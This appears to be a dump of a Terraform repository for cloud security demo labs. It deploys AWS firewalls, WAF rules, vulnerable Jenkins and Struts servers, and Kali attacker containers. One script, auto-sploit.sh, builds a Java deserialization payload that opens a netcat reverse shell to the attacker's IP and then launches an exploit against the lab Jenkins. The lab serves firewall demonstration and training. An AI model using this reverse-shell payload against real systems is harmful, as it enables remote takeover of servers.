    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vm
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   ├── vmseries
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   │   └── vpc
    │   │   │   ├── main.tf
    │   │   │   ├── outputs.tf
    │   │   │   └── variables.tf
    │   ├── project.tf
    │   ├── scripts
    │   │   ├── showheaders.php
    │   │   └── webserver-startup.sh
    │   ├── servers.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
    └── k8s-Prisma-API
    │   ├── .gitignore
    │   ├── .meta-cnc.yaml
    │   ├── LICENSE
    │   ├── Main.tf
    │   ├── README.md
    │   └── Variables.tf
├── oci
    ├── HA
    │   ├── OCI HA deployment guide.pdf
    │   ├── OCI-HA.png
    │   ├── README.md
    │   ├── compartment.tf
    │   ├── firewalls.tf
    │   ├── fw-configs
    │   │   ├── HA-FWA.xml
    │   │   └── HA-FWB.xml
    │   ├── identity_policy.tf
    │   ├── internet_gateway.tf
    │   ├── providers.tf
    │   ├── route_tables.tf
    │   ├── secondary_ips.tf
    │   ├── security_lists.tf
    │   ├── server.tf
    │   ├── terraform.tfvars
    │   ├── variables.tf
    │   ├── vcn_subnets.tf
    │   └── vnics.tf
    └── README.md
├── sdwan
    ├── README.md
    └── sesummit2022
    │   ├── README.md
    │   ├── SE-Summit-Branch.yml
    │   ├── cloudgenix_settings.py
    │   ├── instance.tf
    │   ├── interfaces.tf
    │   ├── keypair.tf
    │   ├── network.tf
    │   ├── provider.tf
    │   ├── setup.py
    │   ├── vars.tf
    │   └── vpc.tf
└── testing
    └── python_test
        ├── .meta-cnc.yaml
        └── python_example.py


/.gitignore:
--------------------------------------------------------------------------------
1 | .idea
2 | venv*
3 | *pyc
4 | .DS_Store
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Terraform 
2 | 


--------------------------------------------------------------------------------
/aws/GWLB-Demo/app_stack/output.tf:
--------------------------------------------------------------------------------
 1 | 
 2 | output "deployment_id" {
 3 |   value = random_id.deployment_id.hex
 4 | }
 5 | 
 6 | output "app_fqdn" {
 7 |   value = aws_alb.alb.dns_name
 8 | }
 9 | 
10 | output "app_mgmt_ip" {
11 |   value = aws_eip.app-mgmt-eip.public_ip
12 | }
13 | 
14 | output "app_gwlbe_id" {
15 |   value = jsondecode(data.local_file.gwlbe.content).agwe_id
16 | }
17 | 


--------------------------------------------------------------------------------
/aws/GWLB-Demo/app_stack/web_server.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | while true; do
 3 | if ping -c 10 8.8.8.8 &> /dev/null
 4 | then
 5 | 	echo "Outbound access avaiable."
 6 | 	break
 7 | else
 8 | 	echo "Waiting for Outbound access..."
 9 | 	sleep 20
10 | fi
11 | done
12 | sudo apt-get update &&
13 | sudo apt-get install -y apache2 php7.0 &&
14 | sudo apt-get install -y libapache2-mod-php7. &&
15 | sudo rm -f /var/www/html/index.html &&
16 | sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/Scripts/master/showheaders.php &&
17 | sudo dd if=/dev/zero of=100M count=10240 bs=10240 &&
18 | sudo service apache2 restart &&
19 | sudo echo "Web Server Ready"
20 | 


--------------------------------------------------------------------------------
/aws/GWLB-Demo/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=
 8 | panorama-server=X.X.X.X
 9 | panorama-server-2=
10 | tplname= <Template STACK Name>
11 | dgname= <Device Group Name>
12 | dns-primary=8.8.8.8
13 | dns-secondary=
14 | vm-auth-key= <Panorama VM Auth Key - generate on Panorama>   
15 | op-command-modes=mgmt-interface-swap
16 | dhcp-send-hostname=yes
17 | dhcp-send-client-id=yes
18 | dhcp-accept-server-hostname=yes
19 | dhcp-accept-server-domain=yes
20 | plugin-op-commands=aws-gwlb-inspect:enable


--------------------------------------------------------------------------------
/aws/GWLB-Demo/requirements.txt:
--------------------------------------------------------------------------------
1 | boto3
2 | python-dateutil
3 | awscli


--------------------------------------------------------------------------------
/aws/GWLB-Demo/topology.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/GWLB-Demo/topology.png


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/README.md:
--------------------------------------------------------------------------------
1 | # blue_team_proj
2 | blue_team Project
3 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/blue-team-igw-ngw.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_nat_gateway" "blue_team_natgw" {
 2 |   allocation_id = "${aws_eip.blue_team_natgw.id}"
 3 |   subnet_id     = "${aws_subnet.blue_team_az1_untrust.id}"
 4 |   depends_on    = ["aws_internet_gateway.blue_team_igw"]
 5 | 
 6 |   tags = {
 7 |     Name = "blue_team"
 8 |   }
 9 | }
10 | 
11 | resource "aws_internet_gateway" "blue_team_igw" {
12 |   vpc_id = "${aws_vpc.main.id}"
13 | 
14 |   tags = {
15 |     Name = "blue_team"
16 |   }
17 | }


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/blue-team-public-ips.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_eip" "blue_team_ngfw_untrust" {
 2 |   vpc   = true
 3 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.blue_team_igw"]
 4 |   tags = {
 5 |     Name = "blue_team_ngfw_untrust"
 6 |   }
 7 | }
 8 | 
 9 | resource "aws_eip" "blue_team_ngfw_mgmt" {
10 |   vpc   = true
11 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.blue_team_igw"]
12 |   tags = {
13 |     Name = "blue_team_ngfw_mgmt"
14 |   }
15 | }
16 | 
17 | resource "aws_eip" "blue_team_natgw" {
18 |   vpc   = true
19 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.blue_team_igw"]
20 |   tags = {
21 |     Name = "blue_team_natgw"
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/blue-team-server.tf:
--------------------------------------------------------------------------------
 1 | data "template_file" "server" {
 2 |   template = "${file("${path.root}${var.server_initscript_path}")}"
 3 | }
 4 | 
 5 | resource "aws_network_interface" "blue_team_server" {
 6 |   subnet_id         = "${aws_subnet.blue_team_az1_trust.id}"
 7 |   security_groups   = ["${aws_security_group.webserver.id}"]
 8 |   source_dest_check = false
 9 |   private_ips       = ["${var.blue_team_server_ip}"]
10 |   tags = {
11 |     Name = "blue_team_server"
12 |   }
13 | }
14 | 
15 | resource "aws_instance" "server" {
16 |   # instance_initiated_shutdown_behavior = "stop"
17 |   ami           = "${var.UbuntuRegionMap[var.aws_region]}"
18 |   instance_type = "t2.micro"
19 |   key_name      = "${var.aws_key_pair}"
20 |   monitoring    = false
21 | 
22 |   tags = {
23 |     Name = "blue_team_server"
24 |   }
25 | 
26 |   network_interface {
27 |     device_index         = 0
28 |     network_interface_id = "${aws_network_interface.blue_team_server.id}"
29 |   }
30 | 
31 |   user_data = "${data.template_file.server.template}"
32 | }
33 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=169.254.169.253
2 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "FW1-MGMT-IP" {
 2 |   value = "${aws_eip.blue_team_ngfw_mgmt.public_ip}"
 3 | }
 4 | 
 5 | output "NGFW-ALB" {
 6 |   value = "${aws_lb.ngfw-alb.dns_name}"
 7 | }
 8 | 
 9 | output "Native-ALB" {
10 |   value = "${aws_lb.native-alb.dns_name}"
11 | }
12 | 
13 | output "Attacker-IP" {
14 |   value = "${aws_eip.red_team.public_ip}"
15 | }
16 | 
17 | output "FW1-Untrust-IP" {
18 |   value = "${aws_eip.blue_team_ngfw_untrust.public_ip}"
19 | }
20 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/providers.tf:
--------------------------------------------------------------------------------
1 | provider "aws" {
2 | #  access_key = "${var.aws_access_key}"
3 | #  secret_key = "${var.aws_secret_key}"
4 |   region     = "${var.aws_region}"
5 | }
6 | 
7 | resource "random_pet" "blue_team" {}
8 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/red-team-igw.tf:
--------------------------------------------------------------------------------
1 | resource "aws_internet_gateway" "red_team_igw" {
2 |   vpc_id = "${aws_vpc.red_team.id}"
3 | 
4 |   tags = {
5 |     Name = "red_team"
6 |   }
7 | }


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/red-team-public-ips.tf:
--------------------------------------------------------------------------------
1 | resource "aws_eip" "red_team" {
2 |   vpc        = true
3 |   depends_on = ["aws_vpc.red_team", "aws_internet_gateway.red_team_igw"]
4 |   tags = {
5 |     Name = "red_team_server"
6 |   }
7 | }
8 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/red-team-route-tables.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_route_table" "red_team_public" {
 2 |   vpc_id = "${aws_vpc.red_team.id}"
 3 | 
 4 |   tags = {
 5 |     Name = "red_team_public"
 6 |   }
 7 | 
 8 |   route {
 9 |     cidr_block = "0.0.0.0/0"
10 |     gateway_id = "${aws_internet_gateway.red_team_igw.id}"
11 |   }
12 | }
13 | 
14 | # Association
15 | 
16 | resource "aws_route_table_association" "red_team_public" {
17 |   subnet_id      = "${aws_subnet.red_team_az1.id}"
18 |   route_table_id = "${aws_route_table.red_team_public.id}"
19 | }
20 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/red-team-sg.tf:
--------------------------------------------------------------------------------
 1 | #Security Groups
 2 | resource "aws_security_group" "red_team_open" {
 3 |   name        = "red_team_open"
 4 |   description = "Wide open security group"
 5 |   vpc_id      = "${aws_vpc.red_team.id}"
 6 | 
 7 |   ingress {
 8 |     from_port   = "22"
 9 |     to_port     = "22"
10 |     protocol    = "tcp"
11 |     cidr_blocks = ["0.0.0.0/0"]
12 |   }
13 | 
14 |   ingress {
15 |     from_port = "443"
16 |     to_port = "443"
17 |     protocol = "tcp"
18 |     cidr_blocks = [
19 |       "0.0.0.0/0"]
20 |   }
21 | 
22 |   ingress {
23 |     from_port   = "5000"
24 |     to_port     = "5000"
25 |     protocol    = "tcp"
26 |     cidr_blocks = ["0.0.0.0/0"]
27 |   }
28 | 
29 |   egress {
30 |     from_port   = "0"
31 |     to_port     = "0"
32 |     protocol    = "-1"
33 |     cidr_blocks = ["0.0.0.0/0"]
34 |   }
35 |   tags = {
36 |     Name = "red_team_open"
37 |   }
38 | }
39 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/red-team-vpc-subnets.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_vpc" "red_team" {
 2 |   cidr_block       = "${var.red_team_cidr}"
 3 |   instance_tenancy = "default"
 4 | 
 5 |   tags = {
 6 |     Name = "red_team"
 7 |   }
 8 | }
 9 | 
10 | # Subnets
11 | resource "aws_subnet" "red_team_az1" {
12 |   vpc_id            = "${aws_vpc.red_team.id}"
13 |   cidr_block        = "${var.red_team_cidr}"
14 |   availability_zone = "${data.aws_availability_zones.available.names[0]}"
15 |   tags = {
16 |     Name = "red_team_az1"
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  attacker:" >> docker-compose.yml
 9 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"443:443\"" >> docker-compose.yml
12 | echo "      - \"5000:5000\"" >> docker-compose.yml
13 | docker-compose up -d
14 | usermod -aG docker ubuntu
15 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/scripts/initialize_jenkins.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  jenkins:" >> docker-compose.yml
 9 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
10 | echo "    environment:" >> docker-compose.yml
11 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
13 | echo "    ports:" >> docker-compose.yml
14 | echo "      - \"50000:50000\"" >> docker-compose.yml
15 | echo "      - \"8080:8080\"" >> docker-compose.yml
16 | docker-compose up -d
17 | usermod -aG docker ubuntu
18 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/scripts/initialize_kali.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  attacker:" >> docker-compose.yml
 9 | echo "    image: pglynn/kali-rolling:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"443:443\"" >> docker-compose.yml
12 | echo "    stdin_open: true" >> docker-compose.yml
13 | echo "    tty: true" >> docker-compose.yml
14 | docker-compose up -d
15 | usermod -aG docker ubuntu
16 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/scripts/initialize_struts.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  struts:" >> docker-compose.yml
 9 | echo "    image: pglynn/apache-struts2-demo:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"8080:8080\"" >> docker-compose.yml
12 | docker-compose up -d
13 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | blue_team_az1_trust = "10.0.2.0/24"
 2 | 
 3 | blue_team_az1_untrust = "10.0.1.0/24"
 4 | 
 5 | blue_team_az2_trust = "10.0.12.0/24"
 6 | 
 7 | blue_team_az2_untrust = "10.0.11.0/24"
 8 | 
 9 | blue_team_az1_mgmt = "10.0.0.0/24"
10 | 
11 | blue_team_az2_mgmt = "10.0.10.0/24"
12 | 
13 | blue_team_server_ip = "10.0.2.50"
14 | 
15 | server_initscript_path = "/scripts/initialize_struts.sh"
16 | 
17 | attacker_initscript_path = "/scripts/initialize_kali.sh"
18 | 
19 | fw1_untrust_ip = "10.0.1.10"
20 | 
21 | fw1_trust_ip = "10.0.2.10"
22 | 
23 | fw1_mgmt_ip = "10.0.0.10"
24 | 
25 | content_bucket = "security-framework-us-west-2"
26 | 
27 | blue_team_cidr = "10.0.0.0/16"
28 | 
29 | aws_region = "us-west-2"
30 | 
31 | aws_key_pair = "AWS-Lab-Pair"
32 | 
33 | aws_access_key = "AWS Key"
34 | 
35 | aws_secret_key = "AWS Secret Key"
36 | 
37 | red_team_cidr = "10.1.1.0/24"
38 | 
39 | red_team_ip = "10.1.1.50"
40 | 
41 | ip_blacklist = [ "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.1/32", "10.0.0.0/8" ]
42 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/waf_acl_association.tf:
--------------------------------------------------------------------------------
1 | resource "aws_wafv2_web_acl_association" "ngfw-alb" {
2 |   resource_arn = "${aws_lb.ngfw-alb.arn}"
3 |   web_acl_arn  = "${aws_wafv2_web_acl.waf_acl.arn}"
4 | }
5 | resource "aws_wafv2_web_acl_association" "native-alb" {
6 |   resource_arn = "${aws_lb.native-alb.arn}"
7 |   web_acl_arn  = "${aws_wafv2_web_acl.waf_acl.arn}"
8 | }
9 | 


--------------------------------------------------------------------------------
/aws/Jenkins-sans-Panhandler/waf_ip_objects.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_wafv2_ip_set" "ip_blacklist" {
 2 |   name               = "ip_blacklist"
 3 |   scope              = "REGIONAL"
 4 |   ip_address_version = "IPV4"
 5 |   addresses          = "${var.ip_blacklist}"
 6 | 
 7 |   tags = {
 8 |     Name = "blue_team_ip_blcklist"
 9 |   }
10 | }


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/.gitignore:
--------------------------------------------------------------------------------
1 | .terraform
2 | terraform.tfstate*
3 | .venv*
4 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/.temp/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 |   attacker:
4 |     build: .
5 |     container_name: attacker
6 |     ports:
7 |       - "443:443"
8 |       - "5000:5000"


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/README.md:
--------------------------------------------------------------------------------
1 | # Jenkins_proj
2 | Jenkins Project
3 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/NAT_GW_Trust.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_nat_gateway" "nat_gw" {
 2 |   allocation_id = "${aws_eip.NAT_GW.id}"
 3 |   subnet_id     = "${aws_subnet.AZ1-UNTRUST.id}"
 4 |   depends_on    = ["aws_internet_gateway.gw"]
 5 | 
 6 |   tags = {
 7 |     Name = "gw NAT"
 8 |   }
 9 | }
10 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/kali vpc-subnets.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_vpc" "kali" {
 2 |   cidr_block       = "${var.KALICIDR}"
 3 |   instance_tenancy = "default"
 4 | 
 5 |   tags {
 6 |     Name = "kali"
 7 |   }
 8 | }
 9 | 
10 | # Subnets
11 | resource "aws_subnet" "AZ1-attack1" {
12 |   vpc_id            = "${aws_vpc.kali.id}"
13 |   cidr_block        = "${var.attackcidr1}"
14 |   availability_zone = "${data.aws_availability_zones.available.names[0]}"
15 | }
16 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/kali-public-ips.tf:
--------------------------------------------------------------------------------
1 | resource "aws_eip" "kali" {
2 |   vpc        = true
3 |   depends_on = ["aws_vpc.kali", "aws_internet_gateway.kaligw"]
4 | }
5 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/kali-route-tables.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_internet_gateway" "kaligw" {
 2 |   vpc_id = "${aws_vpc.kali.id}"
 3 | 
 4 |   tags {
 5 |     Name = "internet gw kali vpc"
 6 |   }
 7 | }
 8 | 
 9 | resource "aws_route_table" "publickali" {
10 |   vpc_id = "${aws_vpc.kali.id}"
11 | 
12 |   tags {
13 |     Name = "PublicKali"
14 |   }
15 | 
16 |   route {
17 |     cidr_block = "0.0.0.0/0"
18 |     gateway_id = "${aws_internet_gateway.kaligw.id}"
19 |   }
20 | }
21 | 
22 | resource "aws_route_table" "privatekali" {
23 |   vpc_id = "${aws_vpc.kali.id}"
24 | }
25 | 
26 | # Association
27 | 
28 | resource "aws_route_table_association" "kalisubnetroute1" {
29 |   subnet_id      = "${aws_subnet.AZ1-attack1.id}"
30 |   route_table_id = "${aws_route_table.publickali.id}"
31 | }
32 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/outputs.tf:
--------------------------------------------------------------------------------
 1 | output "MGT-IP-FW-1" {
 2 |   value = "${aws_eip.FW1-MGT.public_ip}"
 3 | }
 4 | 
 5 | output "NLB-DNS" {
 6 |   value = "${aws_lb.int-nlb.dns_name}"
 7 | }
 8 | 
 9 | output "ALB-DNS" {
10 |   value = "${aws_lb.panos-alb.dns_name}"
11 | }
12 | 
13 | output "NATIVE-DNS" {
14 |   value = "${aws_lb.native-alb.dns_name}"
15 | }
16 | 
17 | output "ATTACKER_IP" {
18 |   value = "${aws_eip.kali.public_ip}"
19 | }
20 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/public_ips.tf:
--------------------------------------------------------------------------------
 1 | resource "aws_eip" "FW1-PUB" {
 2 |   vpc   = true
 3 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.gw"]
 4 | }
 5 | 
 6 | resource "aws_eip" "FW1-MGT" {
 7 |   vpc   = true
 8 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.gw"]
 9 | }
10 | #resource "aws_eip" "webserver" {
11 | #  vpc   = true
12 | #  depends_on = ["aws_vpc.main", "aws_internet_gateway.gw"]
13 | #}
14 | resource "aws_eip" "NAT_GW" {
15 |   vpc   = true
16 |   depends_on = ["aws_vpc.main", "aws_internet_gateway.gw"]
17 | }


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | echo "      - \"5000:5000\"" >> docker-compose.yml
14 | docker-compose up -d
15 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
11 | echo "    environment:" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
13 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
14 | echo "    ports:" >> docker-compose.yml
15 | echo "      - \"50000:50000\"" >> docker-compose.yml
16 | echo "      - \"8080:8080\"" >> docker-compose.yml
17 | docker-compose up -d
18 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/template.txt:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | touch /tmp/test
 3 | sudo su
 4 | add-apt-repository ppa:openjdk-r/ppa
 5 | apt-get update
 6 | apt-get install openjdk-8-jdk -y
 7 | cd /opt
 8 | mkdir jenkins
 9 | cd jenkins
10 | wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war
11 | chmod +x jenkins-2-32.war
12 | java -jar jenkins-2-32.war &


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInDeploy/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | WebCIDR_TrustBlock1 = "10.0.2.0/24"
 2 | 
 3 | WebCIDR_UntrustBlock1 = "10.0.1.0/24"
 4 | 
 5 | WebCIDR_TrustBlock2 = "10.0.12.0/24"
 6 | 
 7 | WebCIDR_UntrustBlock2 = "10.0.11.0/24"
 8 | 
 9 | WebCIDR_MGMT1 = "10.0.0.0/24"
10 | 
11 | WebCIDR_MGMT2 = "10.0.10.0/24"
12 | 
13 | VPCName = "vv-2t-vpc"
14 | 
15 | WebSRV1_AZ1_Trust = "10.0.2.50"
16 | 
17 | FW1_Untrust_IP = "10.0.1.10"
18 | 
19 | FW1_Trust_IP = "10.0.2.10"
20 | 
21 | FW1_mgmt_IP = "10.0.0.10"
22 | 
23 | StackName = "vv-2t"
24 | 
25 | VPCCIDR = "10.0.0.0/16"
26 | 
27 | aws_region = "Region Here"
28 | 
29 | ServerKeyName = "Keypair Here"
30 | 
31 | aws_access_key = "AWS Key"
32 | 
33 | aws_secret_key = "AWS Secret Key"
34 | 
35 | KALICIDR = "10.1.0.0/16"
36 | 
37 | attackcidr1 = "10.1.1.0/24"
38 | 
39 | kali_AZ1_attack = "10.1.1.50"
40 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInFWConf/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/aws/Jenkins_proj-master/WebInFWConf/README.md


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInFWConf/terraform.tfvars:
--------------------------------------------------------------------------------
1 | username = "FW Usernme Here"
2 | 
3 | password = "FW Password Here"
4 | 
5 | untrust-ipaddress-fw1 = "10.0.1.10"
6 | 
7 | WebSrv1_IP = "10.0.2.50"
8 | 
9 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/WebInFWConf/vars.tf:
--------------------------------------------------------------------------------
1 | 
2 | variable "mgt-ipaddress-fw1" {}
3 | variable "untrust-ipaddress-fw1" {}
4 | variable "WebSrv1_IP" {}
5 | 
6 | variable "nlb-dns" {}
7 | variable "username" {}
8 | variable "password" {}
9 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/attacker/auto-sploit.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash 
 2 | 
 3 | echo
 4 | echo "*******************************************************************"
 5 | echo
 6 | echo "Open another terminal window and run a netcat listener: nc -lvp 443"
 7 | echo
 8 | echo "Run the following command  to spawn a shell once the reverse connection establishes:"
 9 | echo 
10 | echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" 
11 | echo
12 | read -n 1 -s -r -p "Once the above is complete - press any key to continue"
13 | 
14 | echo
15 | echo "Enter Attacker IP Address:"
16 | echo
17 | 
18 | read attacker
19 | 
20 | echo "Creating Payload with IP address" $attacker
21 | echo
22 | 
23 | java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" 
24 | 
25 | echo "Payload successfully created and saved as 'payload.ser'"
26 | echo 
27 | 
28 | echo "Executing exploit..."
29 | echo
30 | 
31 | python3 exploit.py
32 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/attacker/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 |   attacker:
4 |     build: .
5 |     container_name: attacker
6 |     ports:
7 |       - "443:443"
8 |       - "5000:5000"
9 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/attacker/run.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | # Running nc on an unexposed port to keep the container up
 4 | 
 5 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 6 | 
 7 |   exec nc -l -p 56789 "$@"
 8 | 
 9 | fi
10 | 
11 | exec "$@"
12 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/jenkins/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | services:
 3 |   jenkins:
 4 |     build: .
 5 |     container_name: jenkins
 6 |     environment:
 7 |       JAVA_OPTS: "-Djava.awt.headless=true"
 8 |       JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
 9 |     ports:
10 |       - "50000:50000"
11 |       - "8080:8080"
12 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/jenkins/jenkins.sh:
--------------------------------------------------------------------------------
 1 | #! /bin/bash -e
 2 | 
 3 | : "${JENKINS_HOME:="/var/jenkins_home"}"
 4 | touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
 5 | echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
 6 | 
 7 | # if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
 8 | if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
 9 | 
10 |   # read JAVA_OPTS and JENKINS_OPTS into arrays
11 |   java_opts_array=()
12 |   while IFS= read -r -d '' item; do
13 |     java_opts_array+=( "$item" )
14 |   done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
15 | 
16 |   jenkins_opts_array=( )
17 |   while IFS= read -r -d '' item; do
18 |     jenkins_opts_array+=( "$item" )
19 |   done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
20 | 
21 |   exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
22 | fi
23 | 
24 | exec "$@"
25 | 


--------------------------------------------------------------------------------
/aws/Jenkins_proj-master/jenkins/tini:
--------------------------------------------------------------------------------
